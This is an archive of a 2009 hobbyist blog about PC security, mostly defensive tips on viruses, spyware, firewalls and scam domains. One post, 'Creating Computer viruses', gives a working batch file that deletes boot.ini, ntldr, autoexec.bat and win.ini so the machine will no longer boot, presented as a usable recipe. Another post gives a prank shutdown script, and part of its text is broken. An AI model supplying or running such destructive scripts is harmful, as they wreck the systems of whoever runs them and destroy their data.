Even though the antivirus was powerful to detect and remove Sality virus, it lacks real time protection that enable the virus to over power anti virus.

     Sality is a family of file infecting viruses.It spreads by infecting exe and scr files. The virus also includes an autorun worm component that allows it to spread to any removable drive when connected to a computer. In addition, Sality includes a downloader trojan component that installs additional malware from the internet. Sality virus have keylogging and back door capabilities. It may infect executable files by prepending its code to host files.

Symptoms of infection:
     Sality disables antivirus software and prevents access to certain antivirus and security websites. Sality can also prevent booting into Safe Mode and may delete security-related files found on infected systems. To spread via the autorun component, Sality generally drops a .cmd, .pif, and .exe to the root of discoverable drives, along with an autorun.inf file which contains instructions to load the dropped files when the drive is accessed.

Removal:
   Try deleting with an anti virus software. If it fails, then remove the hard disk from your computer and connect it to your friends computer and boot into the operating system installed in his computer. Then run the updated anti virus in his system. Anti viruses like avast or BitDefender or Kaspersky or etc can be used. AVG is a bit lame. Repair or delete the viruses found on the scan. Care must be taken not to open any of the drives or files in your hard disk before running the anti virus in your friend's system since it may infect his computer. Then detach the hard disk from his computer and connect it to your computer. Then install a good and updated anti virus with real time protection in order to prevent future infection. Avast provides real time protection and I am satisfied in its functioning. So I am recommending it for your computer.

2009-08-14T03:15:00.002-07:00

Today we are familiar with the term cyber crimes. Sometime we may be a victim of the cyber crime. Most of the cyber crimes are done through the internet. The increasing number of cyber crime has made it difficult to use the internet even for browsing. Some countries have banned the sites related to pornography. Most of the servers creates the black list which contains the name of the websites that may harm the users if viewed. Now let us look into how to use internet safely.
Install a software firewall in your system. The firewall allows you to know about the applications that access the internet and allows you to block the applications from accessing the internet. See the figure below.

There may be virus or trojan installed in your computer that access the internet without your knowledge. The firewall shows all the applications connected to the internet and allows you to block or terminate the application.

As you know, the world's most safest browser is Mozilla Firefox 3.5. It is very fast also. Hence it is more recommended to use Firefox browser. The fire fox has a add-on named Website Of Trust (WOT) which shows how safe the website we visited is. So I recommend you to install this add-on. The screen shot is given below:

If you are visiting a site related to finance, it would be better if you use private browsing option in fire fox. To enable private browsing go to tools menu -> start private browsing. During private browsing, no data will be stored other than downloaded files and bookmarks.

Try to avoid storing user name and passwords in browser. Also change the password periodically. This will ensure more security to your account. Also don't forget to sign out or log out after viewing the website. Do not click on the links that you are unsure about the content.

Try to avoid visiting porn sites and sites that provides serials or cracks for the sharewares. Download files from the servers you trust. For searching software, it would be better if you search software in filehippo or CNET or other such trusted sites.

Black Listed Sites

2009-08-13T04:05:00.000-07:00

Today the number of fraud websites are increasing. These websites steal out time and money. We must take prevention against these site. Also tell about these fraud sites to your friends also so that they will not be trapped. Most of these site offer money for clicking on the links or other such things. But there will be no payment. I had also fell in to these traps and as a result I am trying to prevent others from falling into the same trap. Also I am providing a list of Black Listed Websites. Please bookmark this and also tell to your friends not to fall in trap.

A

aaa-mails.com
abovebux.com
abux1.cn
active-Clickers.com
ad2bank.info
ad-fortune.com
adandel.com
adbux.org
adbuxter.com
adfez.net
admonsta.com
adoost.com
adpalptc.com
adptc.info
ads-bux.net
ads.own.cz
ads4cash.net
adsgain.com
adsneed.com
adstab.com
adstobux.com
adstomail.com
advertbux.com
advercash.net
advertunited.com
advintage.com
aceptc.com
ahacash.com
alabamaclicks.com
alabamaptc.info
alertbux.com
alertptc.com
allcashmail.com
allstarsbux.com
allyousubmitters.com
almiyachts.com
alwaysbux
alwayspay.com
american-mails.com
amigoemail.com
ancient-bux.ch
angelbux.com
annies-biz.com
apachemails.com
anotherrealm.info
applemails.com
appolomails.com
arabbux.com
arcane-mails.com
argusbux.info
ariaptc.com
armybux.com
asonewishes.com
at-mails.com
atlantis.shiftcode.com
auction-emails.com
augbux.com
auto-bux.com
awsurveys.com

B

babyloncash.com
bananaclicks.info
bank-mails.com
bastard-cash.com
baybux.com
beanybux.com
bee-gold.com
beehivemail
bestearnbux.net
bestpaidbux.cn
beta-cash.com
bettybucks.com
bgclicks.com
bigdollat-mails
biggestdollars.com
bigkingpay.com
bigx2.bigxmailer.com
bigx3.bigxmailer.com
billobucks.com
birdclicks.info
bloomingcash.info
boffopaidmail.com
bondjamesbond.net
boostbux.info
bossbux
braveviolation.com
brptc.com
bugcash.com
b-u-x.net
bux.bg
bux.to
bux-4-clicks.com
bux-enterprises.com
bux-paid.com
bux-pay.info
bux10.info
bux11.com
bux100.com
bux24.com
bux2cash.com
bux2click.com
bux2earn.com
bux2you.com
Bux3.com
Bux3.net
bux333.com
bux4.net
bux4all.com
bux6.com
bux69.com
buxa.org
buxalot.net
buxbank.com
buxbin.com
buxbob.net
buxboss.com
buxcash.com
buxcore.com
buxdevil.com
buxdol.info
buxdol.net
buxdotcom.com
buxear.com
buxearn.com
buxeast.com
buxed.info
buxer.biz
buxer.org
buxero.com
buxeuro.com
buxgalore.com
buxhall.net
buxheaven.com
buxhere.com
buxilliard.com
buxing.info
buxinstant.com
buxit.info
buxlab.com
buxlove.com
buxlv.com
bux.mr-rex.net
bux.own.cz
buxmania.cn
buxmania.info
buxme.info
buxnolimit.com
buxology.com
buxon.net
buxone.com
buxor.?nfo
buxout.com
buxparadise.com
buxplus.com
buxplus.org
buxptc.com
buxs.ws
buxsense.com
buxsit.com
buxtc.com
buxup.com
buxvisit.net
buxvisitors.net
buxwanted.com
buxway.net
buxybux.com

C

can-discount.com
cannabisbux.net
cannabismails.com
carclicks.net
cash-overflow.info
cash2all.cn
cash4ever.biz
cash4hits.com
cash4offers.com
cashbux.com
cash-kitty.com
cashclicks.biz
cashclix.net
cashinonads.info
cashmybux.com
cashnbux.com
cashnclicks.com
cashout.me
cashoutclix.com
cashpointclicks.com
cashposse.net
cashread.com
cashsea.com
casinoptc.com
cassandraclicks.com
catch-cash.com
celbux.com
cent-clicks.com
centclicks.com
champbux.com
cherokeeptr.com
cherryclicks.info
chillbux.com
chobitmails.com
class-act-clicks.com
clean-invest.com
click2bepaid.com
click2bux.com
clickandbux.com
click-bux.net
clickbux.com
clickbux.org
clickbuxx.com
clickearnmoney.com
clickerbux.com
clickerscompany.com
clickfantasy.net
clickin.me
clickingmoney4u.com
clickkt.com
clickmonster.info
clickmybux.com
clickonbux.info
clickosaur.us
clickpay.ca
clicks4bux.com
clicks4cash.com
clicktopsites.com
clickvoid.com
clix4coins.com
click4u.net
clixango.com
clixearn.com
clickfantasy.net
clickptc.us
clixmania.net
clixmedia.biz
clixmx.com
clixplaza.com
cloudybux.com
cm-ptr.com
coinclicks.net
coinzbux.com
coolybux.info
cometbux.com
comfortableIncome.net
cooperativemail.com
copperflame.com
copymails.com
cosmicwealth.com
coverclicks.com
cowboy-mail.com
crabclicks.info
crazyclicks.com
crazyptc.biz
cream-mails.com
crewbux.com
crewbuxonline.com
croclix.com
croptc.com
cruiseshipclicks.info

D

daddybux.com
daddyclix.com
dafbux.info
dailybux.info
dailycent.com
dailyclicks.biz
dailyclickspro.com
darkptc.com
daydayupemails.com
dayscash.com
dcbux.com
deepseacash.com
delta-cash.comdj-mails.com
deluxe-bux.info
deluxebux.com
depacco.com
desibux.com
devilptc.com
dicead.com
dingobux.com
directbux.com
divinebux.com
dolarbux.info
dollarclix.org
dollar-factory.com
dollarbux.info
dollarslove.com
dolphindollarsgpt.com
dolphincents.com
dragone-search.com
dragonhole.com
dreambux.com
dreamclix.net
dreamptc.com
dreamstarmail.com
drumcash.com
drunkbux.com
dungeonanddragonemails.com

E

e-bux.us
e-clickz.com
ecash-generator.info
eagleclicknet.com
eagleclicks.info
earn3.com
earn10.net
earn10bux.com
earnbux.info
earn.nu
earnclick.net
earningsecrets.com
earnmybux.com
earnptc.com
earnup.com
earnyourbux.com
easy-clicks.net
easy.tc
easyclicks.org
ecash-generator.info
egyptclicks.com
egyptianclicks.INFO, not the .com!!
egyptptc.com
eliteclicks.com
email2rewards.com
emailpremium.com
emailprofit.us
emailspayu.net
emails-empire.com
emeraldcoastptc.info
englandbux.com
englandbux.org
enjoyfunds.com
entroclicks.com
epicclicks.com
estbux.com
eurobux.com
eurobux.info
eurobux.org
eurocentsmail.com
euroclick.com
euroclickers.com
eurovisits.org
exothema.com
expert-mails.com
extra10.com
extreme-ads.com
extreme-bux.com
extreme-earnings.com
extremeclickerz.com

F

fairydollars.com
famous-clickers.info
fanclicks.info
farland-cash.com
fast.sc
fastbux.com
fastbux.org
fastestbux.com
fatcashcow.com
feelbux.com
fillmyaccount.com
filmyinbox.com
financialfreedomads.com
finebux.com
fishptc.info
flashpay.tuaptc.org (partial to Italians … Mamma mia! )
flashrich.com
foobri.com
forexbay.us
foxcash.net
freebiereferralsptc.com
frei-bux.com
fruitclicks.info
ft-mails.com
ftbux.com
fuckingsituation.com
fullbux.org
funkycashmail.com
futurebux.com
futureclicks.net

G

gaborbux.com
galaxybux.com
gamma-cash.com
gatorbux.com
gem-mails.com
getbuxed.com
getclix.com
getpaidbyemail.com
getpaideasy.com
getpaidtoguru.com
getpaidwatch.com
gg-bux.com
ggmvp.org
ggtheater.com
gibux.com
giftclicks.info
gibuxsurf.com
giga-cash.com
gigabux.net
gilligansptc.info
globalptc.net
globeptc.net
goaio.com
gogobux.com
goldclicks.org
golddiggerptc.info
golddownline.com
golden-bux.com
goldenbux.net
goldenemail.com
golfmails.com
goodbux.net
goodluck-email.com
google-mails.com
got2pay.com
gpm-ptc.net
grandbux.org
grapeclicks.info
greatbux.com
greenbux.com
green-cash.com
greetgold.com

H

halfmillionmails.com
happyclix.net
happyearning.com
hero-mails.com
hickclicks.com
highbidppc.com
hiperbux.info
hispanobux.com
hispanobux.es
hitcoop.com
hits4bux.com
hitzmagic.com
hkbux.com
holiday-mails.com
hollywood-mail.com
holybux.info
honestbux.com
honestmails.com
horrorptc.info
hot-bux.info
huge-mails.com
hunbux.info
husky-mails.com

I

icashout.net
ice-mails.net
icebux.com
iclickclub.com
idealbux.com
ilikeemails.com
impiggybank.com
incentdollars.com
incomebux.net
incursiones.biz
instantad.org
instantbux.com
instantlybux.com
instantlyptc.com
instantcashmakers.com
instantlybux.com
instantlyptc.com
instantrustbux.com
intbux.net
interbux.info
interbux.net
intearn.com
intgold.com
ipbux.com
ipcommunity.co.uk
ippomails.com
isabelmarco.com
islandclicks.net
italianptc.com
iwantbux.com

J

jays-paidmail.com
jazzyptc.info
jetclicks.info
jjlbux.com
job-readmail.com
joinbux.net
jolilobux.com
jreignsfim.com
jthcorp.com
junglecash.com
just-ad.info
just-click.us

K

kabelbux.com
kessefkal.info
kiddays.com
kingbux.biz
kingbux.com
kitcatcash.com
klikini.net

L

l33t-bux.com
lastbux.com
lava-bux.com
legitbux.com
libertycash.biz
lifebux.com
lightstarmail.com
linato.shiftcode.com
linkread.com
links4cashonline.com
littleengineptr.com
lizardclicks.info
loading-mails.com
logans-legacy.com
lolclicks.com
lotionclicks.info
loveads.pl
loyalbux.com

M

macobux.com
madabux.net
madnessbux.com
magicash.org
magicdollar.info
magicdragonhits.com
magnetismail.com
mainbux.com
makefreemoneyonline
makemybux.com
makocashflow.com
malisanko-emails.com
mangoemails.com
many-mails.com
massiveptc.com
masterbux.com
masterclicks.com
matrixptc.com
matrixptc.com
max-bux.com
maxbux.info
max-ptc.com
maystromails.com
mazbux.info
mcbux.com
mcbux.info
mdbux.com (arabbux)
meansbux.net (arabbux)
medal-mails.com
mega-ptr.com
meggarichemails.com
mellow-mails.com
metal-emails.com
metalpaidread.com
meteor-mails.com
michellesrandomizer.com
mifriend.com
milion-mail.com
million-mails.com
millionaire-mail.com
mimimcash.com
minbux.com
mincashbux.com
mixbux.com
mnmbux.com
moderndaybux.info
moneybagsmail.com
moneybux.biz
moneybux.com
moneybux.info
moneybux.org
moneyclicks.biz
moneyems.com
moneymouser.com
moneysbank.com
money-website.com
monsterclix.info
morehunks.com
morpheusptc.com
multibux.com
musicbux.info
mybizs.com
mybux.in
mycashout.net
myministore.com
myrealcash.net
myspacetoearn.com
mysweetheartmail.com

N

nationclicks.com
nature-mails.com
neonptc.com
nerogpt.com
netcash.com
netcashbux.com
netgold4u.com
netwinner.com
newbuxera.com
newclicks.info
nicebux.com
nightbux.com
ninebux.com
number-emails.com
numenmail.com

O

oasisclicks.com
occupex.com
ohomails.com
oldchildclicks.cn
oldschoolbux.com
olympicbux.com
onebux.net
onedollarmail.com
one-mails.com
oneperson-mail.com
online4ads.com
onlinecashclicks.com
onlybux.net
onnetclicks.net
opontes.info
orangemails.com
orbitclicks.com
osobux.info
oursharedsuccess.com
ourpaidmail.com
outlawbux.com

P

p2cdaily.com
paid2clickonline.com
paid4clicks.com
paid.vg
paid-ads.info
paid-bux.info
paidbux.com
paidbux.org
paidmail.italiabusiness.org
paidmail.ru
paidmailengine.com
paidstation.com
paidsolos.com
paidtoclic.com
paidtoclick.net
paidtoclicknmore.com
paidworld.com
pandabux.com
papajuan.info
pay-dough.com
pay-to-click.net
paytoclick.biz
pay2surf.net
paykings.com
paytc.net
payptc.com
payyou123.com
payyoudollar.com
pearclicks.info
pekingcash.com
perfect-emails.com
perfectptc.com
persianptc.com
petromails.com
phoenixcash.info
pixie-clix.info
pizzamails.com
platinum-investment.com
platinum-mails.com
plusbux.com
plutobux.com
pol-bux.com
polarbearmails.com
popularbux.com
pornobux.net
potpourriclicks.info
powderclicks.info
powerbux.org
prettyptr.com
primebux.com
pro-ads.net
probux.info
probux.net
professionalbux.com
profitfrommails.com
profitwonderbux.com
prowlingpantherptc.info
ptc4you.com
ptc-bux.com
ptcad.net
ptcaddicts.com
ptcash.biz
ptcclickers.com (arabbux)
ptcitalian.com
ptcnation.org
ptcprocash.com
ptr-hun.com
ptr-trading.com
puppypaid2clicks.com
pure-clicks.com
purpletulips.net

Q

quality-profits.com
quebecptr.com
quick-clix.com
quickerclix.com
quickestshare.com
quickwin.org

R

rabbit-mails.com
race4click.shiftcode.com
rainbow-mails.com
rainingbux.com
ranocash.com
redbux.com
redroseptc.info
realbux.us
realmails.com
redlightdistrictptc.info
redroseptc.info
referralbux.com
remotebux.net
retrobux.com
rivermails.com
rocashbux.info
roflbux.com
rolex-mails.com
rosebux.com
rosenet-emails.com
roudycash.com
royalbux.ch
rubybux
rundownbux.com
rundownbux.net

S

Sandraclicks.com
sansabux.info
scambux.com
scarlettmails.com
scotbux.co.uk
sea-mails.com
seabux.com
sebasbux.com
secret-mails.net
seekcashmail.com
sepooq.com
seriousbucks.com
seriouxclickers.com
seven-bux.com
sexybux.com
shirecash.com
signptc.info
silvanamails.com
silverbux.com
simplestash.com
simplybux.com
simplyptc.com
simpsonsbux.com
sirensongptc.info
siteclubemail.com
smartbux.net
smartclicks.com
smartclicks.shiftcode.com
smile-email.com
smithbux.com
smoothbux.net
smurfybux.com
snoopycash.com
snowballclicks.com
softbux.com
softbux.net
solarclick.com
solutionscode.com
soulbux.com
southmails.com
spainbux.com
spartaclicks.com
speedbux.org
speedybux.info
spiderbux.com
spikebux.info
splashptc.com
sprint-cash.com
spidermanemails.com
spongebobclicks.info
stablebux.com
storybux.com
strawberryclicks.com
strawberryclicks.info
strongptr.com
studio-mail.com
sunday-mails.com
super-bux.net
superbux.info
super-program.com
superstarmail.com
sure2click.com
surf-ads.net
surfanearn.net
surfcash.net
surfjunky.com
surforhits.com
surprisemails.com
swimming-dolphins.info
sysbux.com
systemmails.com

T

taketheglobe.com
tarbux.com
tata-cash.com
teambux.com.ar
technobux.com
ten-ads.net
tendollarsmail.com
teneuromail.com
thebux.com
thebux.info
thedailyprofit.net
thegoldclick.com
thegoldmail.com
theprofithouse.com
therichcash.com
thinkbux.com
throttlebux.com
timebux.com
timeforcafe.com
timelessearn.com
tincity.net
tiserbux.net
tnt-e-mail.com
tobux.com
tombmailer.com
tons-referrals.com
topbux.com
topbux.org
topdollaremails.com
trade-mails.com
traffic2clicks.com
trafficbux.com
treeclicks.info
triplebux.com
tropicalptc.netsons.org
trustfulmail.com
tumoney.com
turbobux.com
twodollarsmail.com
tycoonmails.com

U

ubiclick.net
ubizs.com
ubux.biz
ubux.tk
uclix.ws
ugains.com
uggibux.com
uggicorp.com
uniclix.com
uniquebux.info
united-empire.com
universalclix.com.br
unlimitedbux.info
uronlinebux.com
usa-canada-email.com
utopiabux.com

V

velocityclicks.com
view-ads.net
vipbux.com
view4pay.com
Viper-clicks.com
visible-better.com
visit4cash.net
voobux.com

W

waoindia.com
warm-mails.com
webbercash.com
wepaybux.com
wingmails.com
winkbux.com
wolfbux.com
woo-mails.com
wordlyptc.info
workfor1dollar.com
workmails.com
world-bux.com
World-Clix.com
worldofbux.com
worldwidemails.com
wrmoney.com

X

x-bux.net
x3bux.com
xbux.com
xclix.net
xeni.dk
xs-ptc.org
xtrabux.net
xtremeclickerz.com

Y

y2e.info
yayclick.com
yesptc.info
yourbux.net

Z

zbestbux.com
zetbux.com
zubux.com
zwallet.com
zxclicks.com

0

039.biz
07Bux.net

1

1-800-mail.com
10bux.net
10clix.com
100-dollars-mail.com
100-percents-work-bux.com
100cents-1000dollars.com
100dollarsmails.com
101clix.com
1bux.org
1stbux.com
1stprofit.com

2

2009-bux.com
200dollars-email.com
200dollarsmail.com
200eurocent-200euro.com
200euromails.com
20dollarsmail.com
24bux.com
247bux.com
25dollarsmail.com
25-dollars-mail.com
2bux.com
2bux.net
2dollaremails.com
2ree.net

3

300dollarsmail.com
30dollarsmail.com
37-21mail.com
3rbux.com

4

4bux.info
400dollarsmail.com
4starads.info

5

50centmails.com
500cents-500dollars.net
500cents-500dollars.org
500pounds-and-500pence.com
50dollarsmail.com
520Searcher.com
5bux.com
5buxs.cn
5ivebux.com

6

60euromail.com
666mails.com

7

7centsolos.com
8

8cent-emails.com
80euromail.com

9

9bux.info
99centclicks.info
9icebux.com

You can also visit: http://www.ixibo.com/2009/02/black-listed-domains-list-scam-sites/ for more information.

RootkitRevealer

2009-07-27T01:45:00.000-07:00

Now its time to look in to the software section. Let us see about a small software called RootkitReaveler. The software doesn't need to be installed, just double click on the icon and just agree the term and conditions, the software is ready to use. It is designed to run on Windows NT or higher editions of Windows. RootkitRevealer is an advanced rootkit detection utility and its output lists Registry and file system API discrepancies that may indicate the presence of a user-mode or kernel-mode rootkit.RootkitRevealer is capable of detecting many persistent rootkits including AFX, Vanquish and HackerDefender. RootkitRevealer is not intended to detect rootkits like Fu that don't attempt to hide their files or registry keys. Since persistent rootkits work by changing API results so that a system view using APIs differs from the actual view in storage, RootkitRevealer compares the results of a system scan at the highest level with that at the lowest level. The highest level is the Windows API and the lowest level is the raw contents of a file system volume or Registry hive. A hive file is the Registry's on-disk storage format. Thus, rootkits, whether user mode or kernel mode, that manipulate the Windows API or native API to remove their presence from a directory listing, for example, will be seen by RootkitRevealer as a discrepancy between the information returned by the Windows API and that seen in the raw scan of a FAT or NTFS volume's file system structures. You can download it from http://filehippo.com/download_rootkit_revealer/tech/

How to create an invisible folder

2009-07-25T07:47:00.000-07:00

You may have the private details in your computer and you don't like your friends accessing them. There are software available in the market for protecting your folder by using a password. In such cases you may get troubled if the password is lost. There is also an another way to hide the folders from your friends. This is a common technique used to create an invisible folders.The advantage of this method is that you need no software for that. Follow the steps given below:

1. Select the folder you want to make invisible.

2. Press F2 or right click on the folder and choose rename.

3. Press and hold the alt key and enter 255 using the number pad (press the Num Lock key and enter 255 using the number pad in the Right Hand Side) and then release the alt key.

4. Press enter. Now the folder appears to be a nameless folder.

5. Now what is the next step ? Yes, that's it, making the icon invisible. For that right click on the folder and select the properties.

6. Select the customize tab and click on the change icon button.

7. Now a new window containing several icons appear. Select a invisible icon from the window and then press OK button of the two opened windows. Now the invisible folder is ready.

You can use this to have fun on you friends by hiding the folders in their computers.

Google trying to put an end to computer virus....

2009-07-24T02:04:00.001-07:00

After the release of the Operating System Google is trying to put an end to the computer virus. The engineering experts is studying the flaws in the existing Operating Systems and the measures to overcome the limitation. If the Google's venture is realized, then it would mark the beginning of a new era in the cyber world. It has been learnt that Linus Upson, Google's Engineering Director, has promised the company is: "Completely redesigning the underlying security architecture of the OS so users don't have to deal with viruses, malware and security updates. It should just work." The dominance of Google among the competitors increases the chance for the success. The Google's policy of the Open Source also add support this argument. But in the history, the release of the Operating System Windows NT threatened several antivirus firms since there was a rumor that all the security flaws of the previous versions of Windows has been solved and no virus can harm the computer running on Windows NT, but the result was against the rumor. There are several challenges before the Google. The web browser Chrome has been reported security flaws and two of them had already solved. We can expect an Operating System free from viruses and malware at free of cost.

Spyware (Part - 3)

2009-07-22T20:29:00.000-07:00

Let us see what are the medium through which a spyware infects computer. A spyware in a computer do not try to infect other computers like virus or worms or trojans. It just collects the user details and send to a particular person or firm via internet. Spywares usually get installed in the computer without the knowledge of the user. The spyware usually comes with a useful software. When the user installs the software without knowing that the software contains spyware, the spyware gets installed in to the computer and sends the details about the user stored in the computer. This is against the privacy in using internet. The manufacturer usually presents the spyware as a useful software. The common categories of the software include themes, games, internet utilities such as download accelerators, web boosters etc. Many Internet users were introduced to spyware in 1999, when a popular freeware game called "Elf Bowling" came bundled with tracking software. The cookie is a well-known mechanism for storing information about an internet user on their own computer. If a website stores information about you in a cookie that you don't know about, the cookie can be considered a form of spyware.
Another way of installing is by using the vulnerabilities in the security software provided to block this spyware. This is by making the user to click on a link that is disguised as a pop up asking any thing that makes the user click on the pop-up. that triggers the installing of the spyware. In a few cases, a worm or virus has delivered a spyware payload. Some attackers used the Spybot worm to install spyware that put pornographic pop-ups on the infected system's screen.By directing traffic to ads set up to channel funds to the spyware authors, they profit personally.

Creating Computer viruses

2009-07-21T09:36:00.000-07:00

In this post I will say how to create some more dangerous application. Activating this will shut down the computer after deleting the files required for booting and not boot during restart. So handle with care otherwise it will end up in the permanent crash. Please do not use this to harm others. I found it from Garena.com.

Open a notepad and type the following and save it as "filename.bat" file.

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

How to make a Virus for fun

2009-07-21T03:53:00.000-07:00

While I was searching for latest information about the computer viruses in the internet, I came across a site that tells how to make a simple virus for fun. Its link is: http://ardiansyahputra.wordpress.com/2008/08/23/create-a-harmless-virus-in-notepad-cara-membuat-virus-jinak-di-notepad/

I have put it for you. It can be edited according to your wish. However I didn't edited as it is his work. Please do not use this for any malpractices.

Step 1.
Open a notepad
Step 2.
Type the following codes in the notepad.
cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo BERSIAP-SIAP MENGHANCURKAN SYSTEM…
echo …………………
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo NEXT…………! properties -> options -> full screen

Step 4 is not necessary. But it will magnify the effect.

Step 5.
Yes, that is the only step remaining -activate it by double clicking on the icon.

To deactivate To Abort virus Click so that your PC is not shutdown: START – RUN and type command: shutdown -a before remaining time is over.
look at the fig. below

Spyware (Part - 2)

2009-07-20T21:53:00.000-07:00

Now let us look in to a small history of the Spyware. I have searched several sites for getting the history of Spyware. The Wikipedia provides good and clear information on the history of the Spyware. I have extracted some part of the history of the Spyware here just for you. The first known use of the word Spyware was in October 16, 1995 and it was against Microsoft Business Model. Spyware was first considered as a hardware meant for the espionage purposes. In the early 2000, the founder of the Zone labs, Gregor Freund, used the term spyware during the release of the ZoneAlarm Firewall. Since then the term is used in its present sense. As of 2006, spyware has become one of the prominent security threats to computers using Microsoft Windows operating systems. Computers using Internet Explorer (IE) is the primary browser are particularly vulnerable to such attacks. It not only because IE is the most widely-used browser, but because its tight integration with Windows allows spyware access to crucial parts of the operating system.
Before Internet Explorer 7 was released, the browser would display a message showing that activex must be installed to view a particular section of the website or the whole website. But in most cases the spyware will be in disguised as activex. The combination of user naiveté towards malware and the assumption by Internet Explorer that all ActiveX components are benign, led, in part, to the massive spread of spyware. Many spyware components would also make use of exploits in Javascript, Internet Explorer and Windows to install without user knowledge or permission. After installtion, sometimes windows pop-up warning messages about the presence of the Spyware in the Computer.

The Windows Registry contains multiple sections that by modifying keys values allows software to be executed automatically when the operating system boots. Spyware can exploit this design to circumvent attempts at removal. The spyware typically will link itself from each location in the registry that allows execution. Once running, the spyware will periodically check if any of these links are removed. If so, they will be automatically restored. This ensures that the spyware will execute when the operating system is booted even if some (or most) of the registry links are removed.

How to keep your PC virus free

2009-07-20T10:32:00.000-07:00

You may be wondered that is there any way to keep the PC from the virus infection. Here are some tips to keep the PC from the viruses:
For keeping the PC from the computer viruses and other malicious applications we need mainly three softwares:

1. Anti-virus
2. Anti Malware Software
3. Rootkit Remover

Now let us see why we have to use these software. Let us took the case of the anti-virus . As you know anti-virus is used to find and destroy the virus. Knowing this most computer users install anti-virus. But many of the people using the anti-virus are not updating the anti-virus properly. This may put your PC in trouble. The anti-virus has generally two parts: 1. virus signature database and 2. anti-virus engine. Each virus has its own signature as a person has his own signature. The virus signature is nothing but a series of codes that is placed in every file it infect. This code is unique for that particular virus. So by simply comparing the virus signature with the data of a file it is easier to detect the presence of the virus. Since more and more viruses are released in to the cyber space daily, the anti-virus firms discovers the virus signatures of the new virus and put the virus signatures in the internet for the user to download. When we update the anti-virus, these signatures are downloaded in to the database of the anti-virus, and anti-virus gains the capability to detect the new viruses. The anti-virus engine compares the virus signature in the virus signature database with the data of the files. If a match is found, the file will be treated as an infected file and took the measures to prevent further infection and deletion of the virus and the recovery of the original file. It also scans memory for the presence of the virus.

The usage of the anti-virus will not guarantee the protection of the PC from all the malicious software. For that purpose we have to use the anti-malware software. Malware Bytes is one of the most common anti-malware software used internationally. The anti-malware software scan the memory as well as the storage device of the PC for the malicious software. This software can effectively remove almost all the malicious softwares in the PC. But there are some malware application that survive this anti malware software. We can use the rootkit remover software for removing that type of applications. Rootkits are capable of killing and hiding different processes running in the Operating System. Some softwares like demon tools use rootkits, but are not malicious software. Rootkit revealer is a rootkit remover tool used today.
These softwares are not enough to keep your PC from all attacks, if you have an internet connection. You must use a firewall to regulate the internet usage by the applications and to prevent the unwanted packets from entering in to the PC. I prefer Sygate Firewall than the windows firewall since it allows to block the unwanted applications from accessing the internet. But do not use more than one firewall for a PC since the firewalls works on its own set of rules and may clash if more than one firewall is used.
Always use the firefox 3.5 browser for more security. The add-ons must be downloaded if it is marked as recommended. Do not install add-on from the third party whom you do not trust.

Always download the softwares from the trusted sites like filehippo,cnet,brothersoft etc. Try to avoid downloading the softwares from the unfamiliar sites. I believe that these tips will help you to keep your PC clean.

Spyware (Part - 1)

2009-06-26T19:59:00.000-07:00

A Spyware is any technology or software that gathers personal information of a person or the confidential information of a organization. A Spyware is a malicious application that is installed in the computer with or without the knowledge of the user. The Spyware, as its name suggest perform the function of a spy. It collects several information from the computer and send the information to the attacker. Some spywares allows the user to configure the victim's computer to his needs. The spyeare may be installed in to the computer without the knowledge of the user through the drive by download or by clicking the link on the pop-up window. But there are spywares available in the market which help the parents to track the sites visited by their children. As you may know that the browser stores the information about the sites you visited in the cookies. If the personal information about you are stored in the cookie, then cookie can be considered as a spyware. In the beginning stage the function of the spyware is just monitering the user. But as the time passes, more powerful spyware were introduced. There functions are not just limited to the simple monitering the user. It can not only collect the browsing habts of the user but can also install the software that will interfere with the normal operation of the computer. You may someetimes noticed that you cannot access the internet, but the data transfer occurs between your computer and the internet without your permission. That may be because of the spyware. Some people asks through the sites like yahoo answers, ibibo.com etc about the problem of the spyware redirecting the website. Even if they entered the correct website address, they are redirected to another site. This shows that your browser has compremissed with the spyware installed. As you may know, any personal information that is collected without the knowledge of the user by any means is a crime. Similarly the creaton and uasge of spyware that collects the personal information about the other people or organization is a crime. Many countries have made strict laws to prevent the spyware. Yet there are people creating the spyware, challenging the laws of their own nation.

Microsoft Malicious Tool For Computer Virus Removal

2009-06-24T20:25:00.000-07:00

You may know that Microsoft releases the patches for the new computer viruses and the bugs they found. They also releases some viral removal tools such as Rootkit Revealer for the Windows users. The arrival of these tools as well as the applications for keeping the computer away from the attack of the malicious programs proves their concern about the security of the computers running on Windows. Microsoft is spending splendid resources including time for the Windows Users. They want Windows to be the secure Operating System. You may be noticed that the new Operating Systems that the Microsoft releases are having far good security than its older versions. Some releases even threatened the anti virus software firms. But the virus makers found the loop holes in the security measures and creats the virus that exploits the loop hole to its maximum extend.
There are several softwares available in the Microsoft's website for the computer security. Millions of people have downloaded and installed these softwares. The people who do not download these software may due to the lack of internet connection or due to unawareness or they are using the pirated version of the Windows fearing that they would be caught if they connect to the Microsoft's website. Dont worry about that, you can download it from other trusted websites like Brothersoft, CNET, filehippo etc.
Microsoft has released a malacious removal tool which is a freeware and can be downloaded from the internet. The tool is ment for Windows Vista, XP, 2000, 2003 Windows Server. This Malacious Software Removal Tool can remove any malacious software that is running behind the process tree. For running the application you have to download the application. Then install it in your computer. You can install the application only if you are accessing the computer with your administrator account. After installing the application you can run the software and perform the scan. It will remove all the malacious software running in th process tree. You can use it along with the other anti virus softwares.
The application to be download is 8.4 MB in size. The file name is "windows-kb890830-v2.11.exe". You can download it from:

http://www.microsoft.com/downloads/details.aspx?FamilyID=ad724ae0-e72d-4f54-9ab3-75b8eb148356&displaylang=en

Crazy Boot Computer virus

2009-06-24T02:19:00.000-07:00

Crazy Boot is a computer virus that is capable of infecting the computers running on Windows. It spreads through the floppy disks. When a host computer is booted from a floppy disk infected by the Crazy Boot virus, the virus starts infecting the host computer. However it does not cause any physical damage or direct loss of information. It is a boot virus. It infects a computer only when the computer is booted from an infected disk. When a computer is booted from an infected floppy, then Crazy Boot infects the Master Boot Record. It reads the highest memory location from the RAM and reside in the highest memory location. Once it gets in to the memory, it starts infecting files that are not write protected.
